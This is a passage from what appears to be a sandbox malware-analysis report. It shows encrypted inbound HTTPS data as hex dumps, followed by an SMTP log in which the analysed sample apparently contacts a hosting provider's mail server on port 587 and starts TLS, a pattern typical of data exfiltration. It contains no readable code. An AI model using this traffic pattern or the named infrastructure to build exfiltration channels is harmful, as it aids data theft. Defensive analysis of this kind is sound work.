ff 05 9d 85 a9 36 05 5b a5 25 bb 7a a1 Data Ascii: g0\|Z$ eV90\|T795h6k'*?v1l%WVgy}H8yRV~U0'O)9=^5kC[Ly,9iE\).._/)7lmvKl -<?F9?;L6PF6[%z
2022-07-08 04:01:38 UTC	193	IN	Data Raw: e5 7a 48 5f 99 92 8d 44 49 6e f8 43 e8 80 d4 fc 7f 1f 6e 5c 65 7e d0 d5 fe ed 52 00 26 ee 1d f1 62 35 65 4f a7 cf e8 11 cf 82 10 22 f2 91 46 24 bf 3b d7 99 70 fc b9 5c 23 66 10 03 8c d7 1b 29 f3 b2 47 b8 05 aa d5 18 f1 38 a3 eb 54 0f d8 c2 f3 48 32 a3 42 de 7a b2 25 e5 f6 fd 98 0a 59 d0 70 68 61 2c 0d c2 b0 b3 e3 2c 4b fc 55 e2 37 7c 19 f7 ae 8d 6c ab b1 6a d0 f1 56 73 15 6b d2 e0 e6 4b a1 7a 7a b9 b0 bf 4c b1 f3 d3 44 b2 90 58 b1 39 3f 80 17 33 60 20 01 74 30 23 da 80 56 6d a8 34 e1 0a d7 ef e7 f1 4a f1 1b 44 cd ac 16 1a 30 7d 05 43 07 e2 43 3d 2e 46 45 3b cc 23 7a 70 48 41 d6 af ad 4b cb a6 8a 8a 20 e0 a4 f2 09 e6 29 bb 9f f8 13 7b db 9e d2 57 3b b4 05 21 91 e7 9c 5e 9d 38 3b 01 f0 aa d3 81 b3 fa b8 13 a1 0e 13 92 13 63 24 de 11 f0 9a 18 6e 93 1e 0c 77 Data Ascii: zH_DInCn\e~R&b5eO"F$;p\#f)G8TH2Bz%Ypha,,KU7\|ljVskKzzLDX9?3` t0#Vm4JD0}CC=.FE;#zpHAK ){W;!^8;c$nw
2022-07-08 04:01:38 UTC	194	IN	Data Raw: 5e bd 21 c6 e3 ea b1 57 e7 c6 2d 28 0d 16 05 cc fc 6a ce bb 5b 2a 63 69 27 ba 26 54 62 58 2b 82 6d 3a 48 76 a3 d4 d2 f0 1c d2 2d d6 7e 8b 9f d0 e8 49 91 22 24 82 6d 71 8e 17 03 a1 b6 8d dc 22 68 01 83 3a 7d fc ac f6 70 b8 fd 74 38 a0 68 af a9 f2 ea 13 5f af 5c cb 3c c3 a9 c3 62 42 aa 5c a6 f2 6b 7d 2d b3 88 86 6e 48 74 c3 51 fd e5 96 de 7d 02 54 6c 7b 6d bf ed f4 8e 7e 00 26 ff 0a f7 6e 47 79 44 be f5 c5 0a f7 97 07 25 e7 a7 53 31 da 68 f4 84 59 f7 9c 5d 30 7b 1b 6e aa d6 02 0f f3 b2 4b d9 37 b2 c2 4c d7 2e b9 ec 4c 09 de d6 e3 41 57 c4 6e ee 4c 88 3b fc e4 ee 93 07 52 a4 67 72 49 37 0d d2 b9 d6 a0 2a 5e fc 7f d8 33 12 3c eb bb e1 57 bd be 6a d0 f3 5d 77 1d 7d db 84 e0 4b a2 7b 59 be da 89 4e a3 d5 f4 49 b0 91 57 a0 50 17 8b 21 1f 7c 21 74 50 21 1f cb b9 Data Ascii: ^!W-(j[ci'&TbX+m:Hv-~I"$mq"h:}pt8h_\<bB\k}-nHtQ}Tl{m~&nGyD%S1hY]0{nK7L.LAWnL;RgrI7^3<Wj]w}K{YNIWP!\|!tP!
2022-07-08 04:01:38 UTC	195	IN	Data Raw: 18 12 62 c9 d8 c0 4c a9 03 2e 97 af 99 ed 64 5f 36 05 68 9d 98 84 29 6f 70 e9 61 87 16 30 65 bd 22 c8 48 12 bf 39 30 4d 9e 4f 55 ae 5a 42 34 7d 8a 77 7e 95 79 be c0 cc 27 70 2f 1f 5d 4c c9 33 61 3f 4f 53 a5 94 33 b1 c8 e5 92 83 f6 98 c7 5a 39 e0 36 90 f1 23 16 a8 28 d1 aa 82 a3 93 3b d4 f1 c4 64 cd 97 77 6b 13 5c bf bb 36 fe d3 fb bc 28 37 f1 ea 27 cb 00 88 c4 8a 9b cd 57 d5 ee 49 95 e2 2c 8c e7 81 51 63 dd 24 2c 81 37 f7 a8 99 82 79 d0 f4 e5 1b fa 4a b7 fd fe af 2d 5c c7 e6 0c b2 29 06 ab 83 3d 47 a9 01 5f 2c ef 78 b2 2d a6 3d fb d6 33 c3 8b b1 ae cc 62 62 11 83 ca 50 c1 e3 d2 77 f8 9a 00 82 d0 1b cf 3a 4b af 8e bb a5 c9 88 c1 44 cb b5 0d 2b 31 29 fc b0 79 88 80 07 1c 3b dc 14 64 e4 09 ed b4 a9 3c 26 4a a5 38 ac 59 c0 e4 1b e0 25 c3 5e 76 6a 35 cb bf ac Data Ascii: bL.d_6h)opa0e"H90MOUZB4}w~y'p/]L3a?OS3Z96#(;dwk\6(7'WI,Qc$,7yJ-\)=G_,x-=3bbPw:KD+1)y;d<&J8Y%^vj5
2022-07-08 04:01:38 UTC	196	IN	Data Raw: fe f0 f9 f7 6b 13 53 61 79 6d de d3 9b a9 70 03 3e ca 07 e2 58 33 78 44 ab c7 86 02 fc 97 3d 0e fd 97 65 27 ec 1c c0 88 54 ff cf 76 23 70 0e 1a 86 ea 1b 0d f7 a1 43 d9 20 a3 c4 4a dd 0c b8 fb 4a 1e f9 d7 e3 41 36 ce 0b d7 76 ac 3a f8 fc cf 8e 14 59 b1 49 07 42 26 0c ff 90 86 82 39 4f e5 0a cd 33 66 22 cc 9b ec 4c bf b2 1e de f9 47 6a 2c 6f cc e5 c3 2a ad 73 16 bf dd ec 49 ba 96 fc 40 a8 ab 7d a0 5c 15 e5 10 1b 7b 1b 3d 6c 30 06 bb b8 53 74 a1 40 f4 1a cd d2 fa f9 42 a5 05 51 dc bb 31 1d 38 74 33 3a 26 f3 4a 35 4f 7a 50 16 df 2c 6a 75 43 26 c6 a4 bb 5e da ae c2 8d 23 84 af fa 09 f2 35 a2 a6 e4 17 6c f4 8f fc 56 14 ba 19 2c 89 ea f1 36 b4 37 2c 05 d4 c6 e6 8b a2 e7 ad 15 ab 62 3a c6 25 65 3e b0 2f fe 95 18 47 97 72 20 34 2b e7 5d 26 3e af 9e af 87 2c 75 17 Data Ascii: kSaymp>X3xD=e'Tv#pC JJA6v:YIB&9O3f"LGj,o*sI@}\{=l0St@BQ18t3:&J5OzP,juC&^#5lV,67,b:%e>/Gr 4+]&>,u
2022-07-08 04:01:38 UTC	197	IN	Data Raw: cd f7 be 2b 50 d6 e1 29 ac 2f 8f cf ef 94 d1 5e d7 ac 6b 93 eb 6e cd c6 90 6a 64 d5 2c 2c 93 31 d9 ac bc 82 3d 97 ce fe 07 da 4a b6 92 bb 9b 2b 49 e1 e6 3a a0 34 08 96 be 21 48 a8 66 1c 16 ec 6d b4 3a a2 3f d7 fc 34 d8 ea 85 bf ca 54 5f 02 e2 fc 4b ff e3 d8 77 99 ae 21 99 c1 17 d2 2e 18 9c 8a bd 81 f2 8f d1 4a bf 97 38 2d 12 2e e6 a8 55 b5 84 00 01 1c d5 72 48 8b 20 f4 a7 be 3a 01 51 a5 28 8b 50 a6 df 74 d4 3e b1 6d 7d 7f 5a 8c 98 a8 1c 99 17 43 24 71 da cb 7c 74 3d a7 72 ed b8 ca 0b 35 48 ef e1 5c 2c cb d8 97 38 ad 7b f3 50 50 fe 7f 71 86 8f 4e 40 a8 16 2c da 99 b8 10 d0 8f eb 4f e2 fd 51 f5 6e 22 b9 84 bb 66 51 73 0f e3 44 1d 67 83 87 25 c9 4f f0 c2 6f 22 89 bc ae 44 5f 90 d9 d3 84 08 6e ca 1b d0 fb a8 59 51 b2 2d 53 38 e2 79 12 15 49 47 05 69 cd 7c bc Data Ascii: +P)/^knjd,,1=J+I:4!Hfm:?4T_Kw!.J8-.UrH :Q(Pt>m}ZC$q\|t=r5H\,8{PPqN@,OQn"fQsDg%Oo"D_nYQ-S8yIGi\|
2022-07-08 04:01:38 UTC	199	IN	Data Raw: f1 1d 67 09 60 ca ed c3 4f e1 5b 6e bf d5 9c 59 be f9 f5 76 b9 86 42 bd 5a 1d 96 63 2d 76 37 00 7d 38 45 e9 9b 5c 75 a4 59 d6 51 f0 f5 fa f9 5d ca 12 67 cd 96 01 1d 37 74 13 43 18 ee 4c 2a 20 46 4f 15 d9 63 48 75 5e 34 f4 b1 8a 4b cc aa a1 c5 0d eb a5 e7 60 cd 29 bd 98 e4 11 68 f4 8f d8 49 73 86 12 36 89 e7 f1 18 ae 23 31 19 fc c7 e4 ca 93 e1 b4 0d af 0e 13 e0 04 69 21 c6 14 fc 9e 0f 28 b7 1b 0a 05 36 ed 42 34 25 d5 ba a7 9a 2a 72 14 f1 f4 3d 05 39 e6 2a d8 ce e5 49 34 9c 8f b5 e5 91 25 21 f2 8c 89 dd 06 c3 29 f2 81 5f aa fd 88 0a 85 13 55 47 24 2d a1 26 5e b3 0d d7 20 42 c8 fe 37 3a f9 fc 83 1d f8 ba f7 f5 36 d4 4e f5 79 1a ac 33 ea ab 4e 4b d3 b2 5e 74 5f 0e 00 42 e8 ff f2 45 b8 32 c5 2b a9 26 5c 92 60 c4 e1 5a 9d 7c 9b f6 10 99 34 c8 ca c4 1e 67 35 06 Data Ascii: g`O[nYvBZc-v7}8E\uYQ]g7tCL* FOcHu^4K`)hIs6#1i!(6B4%r=9I4%!)_UG$-&^ B7:6Ny3NK^t_BE2+&\`Z\|4g5
2022-07-08 04:01:38 UTC	200	IN	Data Raw: 2a f6 a8 1c 98 9b 1b 16 34 cf 71 49 ea 10 f8 9a b9 33 10 5d a3 51 8d 4c 8f d2 1e d6 32 c5 37 40 62 47 c3 b8 b2 79 b9 13 43 33 74 b8 fa 7e 15 18 a3 3d c8 a2 af 20 31 48 ea ed 5c 0e c8 c2 f2 39 a9 7b dc 45 36 ee 5c 19 8a 99 3a 69 ba 7c 2e c9 ed ff 2f de 94 fa 28 c5 e1 34 d8 6b 6d 9f 9f de 40 54 73 07 fd 30 15 74 e9 aa 37 bd 2e cc b7 61 27 e0 af b3 3d 74 83 b3 d3 96 7c 08 c8 7e c3 d5 fb 6e 41 d8 0b 42 4c a6 48 7d 3e 55 22 20 6f cd 48 ab 36 f8 d2 e3 dd 7c f1 f3 39 0c 10 2b 14 cd f6 6c c2 b7 41 79 55 68 27 ad 49 47 62 4f 00 d6 70 3e 2d 3a b1 c5 c3 e8 2d df 5d ff 1f 8c 9f ed d9 60 91 3e 0a 86 4d 08 ad 0b 70 96 bb 81 9c 0b 68 21 fa 06 79 88 9f c4 79 b9 98 53 24 a4 52 ee 99 e5 fd 0a 45 9b 67 d1 27 c3 dd 90 61 55 df 49 bb 86 75 48 2b 83 b4 8c 64 40 70 e3 28 ea e5 Data Ascii: *4qI3]QL27@bGyC3t~= 1H\9{E6\:i\|./(4km@Ts0t7.a'=t\|~nABLH}>U" oH6\|9+lAyUh'IGbOp>-:-]`>Mph!yyS$REg'aUIuH+d@p(
2022-07-08 04:01:38 UTC	201	IN	Data Raw: 95 ee f8 e4 95 f7 d9 3b bf 62 31 eb 57 6b 36 c4 22 db 9a 05 28 b3 1c 00 03 30 ff 41 3b 2b 9e ad bc 9b 3e 6a 78 e7 fa 0f 1e 28 a9 1e a1 c9 ef 78 2a 94 9e 91 e4 e3 03 3d 86 86 88 de 0b e3 35 e3 85 55 aa f8 94 7e 99 3f 53 5d 21 3a 9b 2c 54 b5 07 d7 1e 46 c8 c2 1d 30 ee 85 c4 1f e9 8a c1 cc 36 ce 3a e9 6e 07 96 0b 8f b5 2b 70 fc 87 42 48 5a 09 39 53 f8 9a d3 20 9a 09 d9 25 b4 27 52 99 6f ad de 54 83 47 97 ea 10 ba 34 d6 e8 c0 05 0b 37 10 16 f7 f8 b5 47 aa 4e 2c 83 db 98 f8 2f 5d 2a 71 44 b2 9c be 09 1a 7f ea 2c 81 02 44 53 b6 1a d9 54 7f d2 02 36 4b 9a 47 5f b4 7f 40 4d 0e ad 40 53 bc 68 ae ed c8 39 78 5d 25 73 5e fc 52 57 19 7f 43 bb 84 1e ba dc 91 b5 b8 c9 eb e7 4d 5a dd 37 9e f6 37 62 9d 34 ee 8a 95 c0 9a 26 bd f8 da 64 cd 97 77 6b 13 5c bf ac 21 fc d1 e0 Data Ascii: ;b1Wk6"(0A;+>jx(x=5U~?S]!:,TF06:n+pBHZ9S %'RoTG47GN,/]qD,DST6KG_@M@Sh9x]%s^RWCMZ77b4&dwk\!
2022-07-08 04:01:38 UTC	203	IN	Data Raw: 84 c2 0c 52 9b aa db 44 3a e9 d7 b3 f2 0b 06 b5 19 b1 8a ab 13 2d bc 6c 27 38 a4 0a 0e 40 39 43 43 1a cc 27 c9 42 a5 92 93 a3 93 0b b6 4b 79 6d 0c 77 b9 9e 1f af ca 35 7d 0a 07 46 a3 25 33 07 24 70 d6 15 47 20 70 d0 b0 b4 2f d5 a5 45 b4 74 f6 f4 b6 37 99 e6 33 5f 63 98 1a 7e d3 1e e7 d6 f1 a0 c5 90 48 ff 4e 18 fd f8 99 1a cd 99 32 c1 79 03 a9 fa 86 85 68 b1 55 0d 92 4c b4 29 21 03 21 de 2f c1 80 12 2e 5e d2 f2 eb 0a 27 1a 96 26 9c 00 23 9d 1e 64 80 b4 0c 28 bd ac 1b 4c 1b 67 57 8b 71 86 05 5b 08 0e ca ad 81 67 88 63 a3 56 9d f7 0a 41 a2 6d b7 ed 34 9c d2 30 54 29 7c 60 e7 b7 6a 7f 92 d1 ae 18 63 e6 b1 16 b6 78 cd 9f 37 77 a4 a4 91 20 59 ad 05 94 1d c7 55 8b 84 8e 7a a3 34 d7 27 09 34 c3 b9 bd d2 d3 e3 4b 3c 08 db af 76 13 60 9e c5 88 3e dc de 10 b7 9a 34 Data Ascii: RD:-l'8@9CC'BKymw5}F%3$pG p/Et73_c~HN2yhUL)!!/.^'&#d(LgWq[gcVAm40T)\|`jcx7w YUz4'4K<v`>4
2022-07-08 04:01:38 UTC	204	IN	Data Raw: e3 24 15 3e 6c 7a 38 93 1b 64 4b ef 3f a7 26 db 50 6d ee 97 fc ba 32 e7 1f f0 96 6a c7 5b a8 22 4c 72 19 d1 9c 70 29 5a d2 af 23 0b 51 e2 2e 18 98 e5 d5 41 04 25 56 b9 fc 52 72 0a 9c e0 b1 76 10 34 c5 5f ad ac 8e 97 4d 59 2d 7a db 3f c2 14 25 26 8f 12 05 01 c4 0a 5b 5d ab 4f 17 2d 53 36 2b 8d 49 12 4b 05 26 d7 ed 5f d1 a1 f9 da d2 be bd 87 28 47 8a 4e e4 9a 59 0a f2 51 b8 ed ee dd f9 58 9d 9d a2 76 1c e7 0c 1a 76 31 83 7d 49 93 a4 97 d3 5d 9b b1 8f 54 2e 60 ee ab 8c dd bc 3a a4 b0 2a e1 87 19 b6 a9 f0 2b 02 b6 63 2d db 45 b0 ca ec f5 0f ee a6 91 6c cb 56 b2 bf d9 dc 4e 3f b1 9b 4d d4 5f 75 b8 ff 4b 2e c7 74 1f 7c 86 1f d3 02 cf 48 9e 93 53 a5 aa f0 dd b4 05 05 64 f6 93 36 a4 0d 23 11 91 f6 41 76 4b 7a a7 5d 4a fa 6b 52 fd be e1 b6 2d ad e5 5e 79 5e 57 91 Data Ascii: $>lz8dK?&Pm2j["Lrp)Z#Q.A%VRrv4_MY-z?%&[]O-S6+IK&_(GNYQXvv1}I]T.`:*+c-ElVN?M_uK.t\|HSd6#AvKz]JkR-^y^W
2022-07-08 04:01:38 UTC	205	IN	Data Raw: 9e 20 40 c1 8d 6e f4 8e b8 7e 30 d9 78 bc 42 a8 ac 97 05 33 ab 26 c1 a6 17 3f 2b cd 8c e7 1f a7 f5 86 a8 4c 8e 90 9e 1a 64 74 07 7f 1a b8 b2 86 e3 1b 6d 5c b6 7d 89 05 44 02 3c c4 a2 9b 6b 9b e5 61 4f b3 f2 22 42 b8 48 b0 ef 3b 83 4d 98 54 09 7f 73 e7 b7 67 78 94 c9 27 d1 6d ce b8 3d bf 6f c5 8b 2b ea 77 a2 83 50 42 b1 8b 47 12 d3 21 8d 8f 95 e8 e6 ed d2 23 00 2f 4a 71 a7 d5 c7 63 8a 27 9a 7e ac 56 10 74 86 ce 85 38 de dd 19 a4 99 3b 3c 5c 0e ab 96 2e f7 ce 0c 62 d0 b7 eb 2f d9 94 87 38 c0 e9 28 c9 3b 7f e5 61 7f 01 55 f4 d9 53 4b b9 ec 20 75 c3 3c 93 7d bb 89 fa 8e af 48 6e 33 ae f9 72 7e 56 03 e0 ae 48 82 27 5f 6f 37 2a 79 bc cf af 16 0d 42 94 cf 48 c7 ae 41 7b e9 4b 84 ca 9d 03 ab 4b c8 c8 83 61 0c 1d 29 b5 1a 71 d7 79 31 ed 9f 99 21 fb 51 4a 7f 15 77 Data Ascii: @n~0xB3&?+Ldtm\}D<kaO"BH;MTsgx'm=o+wPBG!#/Jqc'~Vt8;<\.b/8(;aUSK u<}Hn3r~VH'_o7*yBHA{KKa)qy1!QJw
2022-07-08 04:01:38 UTC	206	IN	Data Raw: 7f d1 b7 a2 90 b5 53 87 57 d9 9f 56 97 e6 4b a2 ed fe 40 31 57 b5 bf a2 76 1e 23 16 9f bb 37 b1 fe 46 8d 24 5f d4 48 1b aa 07 f6 a4 6c c6 a3 98 5d 0f 3e 98 ad 29 f4 07 aa be b3 f4 3e 18 33 fb 2a f5 5b b4 c7 e2 ef 47 c4 a2 90 67 9b 2a de f5 bf da 5c bc 7a 86 68 d3 4f e6 2d fe 6f 2c d5 e4 1e 6b 03 58 dd 46 e7 4f 9f 8f 40 37 52 ea df b9 0a 1e f7 8e 86 1f b7 9f 3f 15 8b 7c 12 ec a5 62 a3 53 45 f5 ee c7 fb a9 60 ba 27 ad 52 98 4b 2b 5e 15 0c 14 c7 e8 69 7d 5d 9b 16 2f 96 61 8c 57 0e 74 72 24 c2 43 42 e3 c1 be 7a bd 5f ac 39 1a 03 3d 82 d4 c4 0e 5a 8e 4b 6e 09 d2 80 04 7a 66 d4 7a b7 c6 d7 40 58 4b b8 99 a8 a0 ab a6 9f 5c c8 6a 10 c1 51 94 09 51 e2 ed ce cf db 10 6b ab 8b 7f 8b a3 e9 9b 48 a2 9e d0 bb 0f 2c ed fd ab 2d 30 71 59 9c 54 47 13 92 c8 58 c1 32 89 ca Data Ascii: SWVK@1Wv#7F$_Hl]>)>3[Gg\zhO-o,kXFO@7R?\|bSE`'RK+^i}]/aWtr$CBz_9=ZKnzfz@XK\jQQkH,-0qYTGX2
2022-07-08 04:01:38 UTC	208	IN	Data Raw: 13 c7 54 96 97 a9 f4 7b 20 cd 2a 1a 37 76 70 a0 df d8 ed 56 2b 95 0f a4 51 15 73 86 ce 91 2c ab c2 02 a4 80 2e 37 75 0e bd 8a b3 2f d2 1b 0b d9 bf eb 2a ca 93 86 20 c0 e6 41 c9 25 65 f9 7e 7c 05 44 77 05 50 76 be f3 37 1c c8 29 b4 73 ab 1b 62 8e af 49 7f 31 a0 ec 65 f4 b8 03 e0 af 47 07 c3 4a cf d9 28 62 2d a5 16 14 38 53 15 00 c9 38 3f 2f c5 cb 4f 96 48 7b 14 a4 48 c9 da 01 8b 1a ad ec bd 3a 7a d3 7e 57 7d 5f 9d 24 7c ba 59 6a 97 bb 01 0c d8 8b f9 7d d7 e2 9e 94 77 0d 52 a1 fd 77 f0 7b 2a ef 60 e9 aa 58 8c ad be 59 f1 cc ce fc 4d 93 a5 b2 87 ce 80 51 e8 66 a0 88 92 bb 9f f4 fe 50 7a 94 65 46 9b c0 ef 8d 75 ad 55 11 0d 22 b8 1a 04 7b df 55 2f ae a4 58 6f a1 32 cb 7b df 70 26 b4 80 5a 4a 9b 7c 25 79 9e 7e 72 80 73 b5 28 1a e2 7d d5 47 ca ce 39 bf 65 ea 24 Data Ascii: T{ 7vpV+Qs,.7u/ A%e~\|DwPv7)sbI1eGJ(b-8S8?/OH{H:z~W}_$\|Yj}wRw{*`XYMQfPzeFuU"{U/Xo2{p&ZJ\|%y~rs(}G9e$
2022-07-08 04:01:38 UTC	209	IN	Data Raw: ec c8 b9 0c 19 64 03 53 3e a4 0c b6 04 97 f0 41 83 aa 6f af 54 4b eb f6 c1 fb b5 f0 34 70 91 d7 4c 4c 4c cf 48 dd 0e 5a fc 60 67 d5 66 15 29 9e 76 1d 08 da 4b f4 36 d9 5f df 3b ce a2 f5 d3 43 c4 3f 16 03 27 0d d2 ca 69 d2 7a 4d 68 2d dd 80 19 66 fb 0a 73 b8 49 c2 56 57 c8 70 89 26 54 b8 28 4a 5b cf fa 98 2e 4c 86 01 7f fe fa 52 3a ca 63 5e bb 19 1e 63 b1 e8 1a 1e 92 8b 45 a3 0d a2 20 f4 a9 a2 28 66 5b 12 99 5b 18 96 dd d4 14 2f 93 43 05 5d 87 d1 d1 59 3e ef cb 37 95 06 1a ce 13 a5 0b a0 09 56 ba 73 2f 30 bb 05 1a 6b 3c 5e 56 09 4d e6 cf 50 26 9b 81 bf 06 94 32 91 79 6d f8 79 b4 9a 03 a9 da 27 f9 a1 08 45 5f 87 3d 15 ac d5 c4 95 42 23 6b d5 a3 d3 b2 4d a3 40 bd 76 e5 f4 ac aa 0a e9 45 50 ed 3f 28 ff 60 83 43 d0 e8 92 45 10 5b e1 4d 16 ee 7b 9f 0e 4c 90 2e Data Ascii: dS>AoTK4pLLLHZ`gf)vK6_;C?'izMh-fsIVWp&T(J[.LR:c^cE (f[[/C]Y>7Vs/0k<^VMP&2ymy'E_=B#kM@vEP?(`CE[M{L.
2022-07-08 04:01:38 UTC	210	IN	Data Raw: 95 86 5f 26 82 fe 43 8d 4d 3c 97 b1 11 96 f3 0a 0d f7 60 94 df 44 8d 27 ff d4 6f 18 aa 04 37 a4 6f c6 a2 98 5e ca 36 93 ab 27 f3 95 9a 65 b5 e7 a2 02 a6 51 ac 08 59 a7 48 e2 f5 cf 45 ba 9f 7b e6 2a c2 7d 1a c1 4b 20 b2 8d 5a 52 55 69 ea 82 47 33 c9 65 55 78 84 3f c6 45 d2 5f 1e 4f 53 a5 6b ea cf ac 8b d1 77 91 0f 37 ab 83 b0 04 97 ec d2 fe b0 07 a9 40 45 fa 6a 9e d1 bc ec a2 37 3f 0d 5c 4b df 47 80 ce 9c 06 f5 67 f4 5d b5 06 a7 2a 6a 8f 55 7a 57 7b 30 c5 d0 ca 30 c8 ad 7a b6 71 b3 2b 16 11 06 8b c8 cd 0e 5a ba 42 72 80 d2 9b 1e f4 a6 d6 7c bf da 4a 9e 44 5a 2c 80 34 5d b6 b4 99 48 5c 73 9e 3d 5e 94 01 63 96 ea 5f a6 39 17 45 a2 84 f1 70 3e f2 98 45 a1 82 75 b1 14 37 ef 75 66 22 32 f2 41 87 56 da cb 82 dd d5 c1 20 93 42 ac 5d 9b 5f 7e 56 ba e9 c4 b3 e7 7d Data Ascii: _&CM<`D'o7o^6'eQYHE{}K ZRUiG3eUx?E_OSkw7@Ej7?\KGg]jUzW{00zq+ZBr\|JDZ,4]H\s=^c_9Ep>Eu7uf"2AV B]_~V}
2022-07-08 04:01:38 UTC	211	IN	Data Raw: 2d 51 f9 c0 d4 d8 ed 45 20 9a 8b a2 58 1c 6f ee d9 f8 36 ca d8 1a ac 8e b3 e8 7d 1c 3f 8c a0 3f dd 9e cb dd a2 6d 25 df ba 9c 34 c9 e6 b4 09 38 6a 64 6b 70 1a 56 f4 c5 54 79 3a e6 2f 04 df b5 d3 62 bc 89 fb 94 21 ab 6c 26 29 ec 65 f4 a0 1f 72 36 48 82 27 74 48 24 35 61 2d 90 1f 0e ac 49 9b c0 cd 3f ad 43 1f ea 5c 05 c0 85 88 c1 51 ca d9 f4 6b 10 93 e2 af bb 7b c7 eb b1 f3 90 e9 2b f9 5e 6c 6a 87 a4 94 f6 50 53 d8 6f 47 6a 63 80 d7 d1 52 a2 fc 97 e9 fc 81 e8 f2 c0 79 4b 1e 84 4e 5f f5 fe 4f e1 57 0e 6a 33 3c 46 71 48 48 ce bc 81 9d 27 5f f7 eb f0 97 8c 70 c4 2f cb e1 8e 72 bf 55 11 4d 09 ad 95 f8 6c 5a 8d 3c 3c c9 41 fa 5b ba 0b 7f c5 ec 2b b2 80 51 51 84 f2 ca 6a 0d f6 90 89 41 c2 27 99 03 6e c7 64 ed c1 3e 2d 0c 3f 2d 09 ae 63 67 24 01 47 80 57 7c 42 bb Data Ascii: -QE Xo6}??m%48jdkpVTy:/b!l&)er6H'tH$5a-I?C\Qk{+^ljPSoGjcRyKN_OWj3<FqHH'_p/rUMlZ<<A[+QQjA'nd>-?-cg$GW\|B
2022-07-08 04:01:38 UTC	212	IN	Data Raw: 19 92 e2 57 eb b3 f3 cd 5b 4b e9 e0 de 76 7e f8 b0 31 bd db 41 51 56 52 84 5d 78 d3 e8 7f 69 5f b1 08 2f 8c 63 95 dd d3 51 71 23 c6 d0 aa 3a dd a1 f5 d7 55 b1 36 16 06 31 ac db da 17 ce 60 4e 7d 1d d2 8c 04 7c 67 df 6f a9 c0 d7 5f 58 54 b0 8a 20 46 ad ad 9f 54 d5 73 98 25 70 98 01 79 ed f5 49 20 c4 0b 45 b7 97 f7 6a b7 f3 9c 4c bd 89 4c b3 0d a0 7c f8 bd 36 32 f3 94 93 51 4b 95 4a cd 5a c7 21 86 c0 18 41 09 02 de 51 2a 62 10 b4 fb 06 00 b5 3b b7 9f ba 9b fe b3 7b 30 bb 6f 09 1c 5e 34 67 42 1a d8 29 4e 9f a6 86 9e 32 da 84 bc 42 5c 78 6d 64 bb 1f c3 a6 d1 3b 71 0e 14 d5 62 2e 3b 0f 24 69 d8 1c 42 25 78 d8 b9 a8 a7 40 be 4c 30 b7 fa f4 aa b1 11 e6 c6 90 e2 3c 04 eb 60 83 3f df f9 a3 c6 c4 57 f4 44 1e fc fb 85 9e 4c 96 23 61 d0 08 a8 ea 87 99 7b 2c d6 08 b5 Data Ascii: W[Kv~1AQVR]xi_/cQq#:U61`N}\|go_XT FTs%pyI EjLL\|62QKJZ!AQ*b;{0o^4gB)N2B\xmd;qb.;$iB%x@L0<`?WDL#a{,
2022-07-08 04:01:38 UTC	213	IN	Data Raw: cd 4c ae cb f5 63 77 9d 83 bd 54 73 d5 6b 45 fd 82 9c 86 f8 b2 5e 6d 95 ab 81 b7 d0 fa d9 0f c6 0b 76 fc 57 6b 53 f6 7d f6 fb 10 28 9f 72 20 77 37 9e 4b 52 3e fb ec ce 29 5e 13 78 b2 95 7e 6c 6a c8 57 a1 ad 80 0b 42 c1 ec b2 96 a1 62 44 86 e9 e7 ac 72 a3 47 d7 e4 45 aa f6 ed 1b da 14 3d 4b 48 3a ef 2a 3a a4 7e be 6d 53 bc e9 5f 36 8a 93 c4 16 8c fe 9e 87 53 97 3a 9a 0b 43 c9 48 ea cd 2b 79 8c 8b 2c 77 2f 0e 72 60 81 ff 81 37 fd 39 b5 23 c7 2d 19 92 16 ad 93 35 f3 21 fe b6 64 ff 55 94 a3 95 7c 25 50 45 62 a8 bf 98 2e d5 03 4c f0 e6 fd e4 64 4c 53 14 37 a5 e8 8f 4e 0e 16 e2 61 ae 71 51 36 a9 51 d9 2d 7f 91 3c 58 4b fb 49 31 85 34 61 34 5b ef 6f 21 8e 18 b9 a4 f0 49 63 2f 05 38 4e 85 01 15 0f 0d 6e cb b4 5a 86 af 89 c7 b4 b0 d9 82 63 5a a1 52 9c 9f 3c 16 8a Data Ascii: LcwTskE^mvWkS}(r w7KR>)^x~ljWBbDrGE=KH:*:~mS_6S:CH+y,w/r`79#-5!dU\|%PEb.LdLS7NaqQ6Q-<XKI14a4[o!Ic/8NnZcZR<
2022-07-08 04:01:38 UTC	215	IN	Data Raw: 4f a0 8c 51 b6 1f 22 fd f5 bb 23 20 73 49 92 44 5a 16 83 cf 54 c9 2e 81 c2 0d 53 89 df df 44 3b e1 d9 b6 f5 08 08 bb 1b b7 8a a8 1b 23 b2 6e 21 38 a6 0b 12 50 3b 47 43 1b cd 3b ce 42 a7 93 8f b1 13 86 b2 4c 78 7f 79 71 a9 9f 1e a7 d4 35 79 00 06 57 df 26 33 07 2c 74 d6 14 4a 2d 76 d0 b1 a6 af 48 ab 5d b3 7e f8 fa a4 b7 04 f4 46 4d e3 39 08 fe 72 03 e2 de ec b2 45 0d 55 fa 4a 18 fc fa 97 1c cd 98 20 41 d0 0d af fa 86 98 7a 31 c8 08 b2 4c a6 a9 90 07 21 df 2e cf 86 12 2d 5f dc fc e9 0d 27 18 97 28 8d 80 96 99 18 76 00 15 0b 08 bf be 9b ed 15 65 52 ab 73 87 0b 47 0a 21 ca aa 86 65 99 e3 62 4b 93 f3 2a 41 bf 68 b2 ed 35 92 cf 35 51 09 7e 6e e9 b9 6f 7f 92 c0 2e d9 67 c6 b0 18 b8 7d cd 9e 39 6a aa a3 91 24 57 a3 0b 9a 13 c1 55 8a 85 9c fa 66 3c d0 24 07 25 43 Data Ascii: OQ"# sIDZT.SD;#n!8P;GC;BLxyq5yW&3,tJ-vH]~FM9rEUJ Az1L!.-_'(veRsG!ebK*Ah55Q~no.g}9j$WUf<$%C

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jul 8, 2022 06:01:51.433058023 CEST	587	49749	185.101.224.45	192.168.11.20	220-ehost4045.hostinet.com ESMTP Exim 4.94.2 #2 Fri, 08 Jul 2022 06:01:51 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jul 8, 2022 06:01:51.433449030 CEST	49749	587	192.168.11.20	185.101.224.45	EHLO 536720
Jul 8, 2022 06:01:51.464891911 CEST	587	49749	185.101.224.45	192.168.11.20	250-ehost4045.hostinet.com Hello 536720 [102.129.143.28] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jul 8, 2022 06:01:51.465188980 CEST	49749	587	192.168.11.20	185.101.224.45	STARTTLS
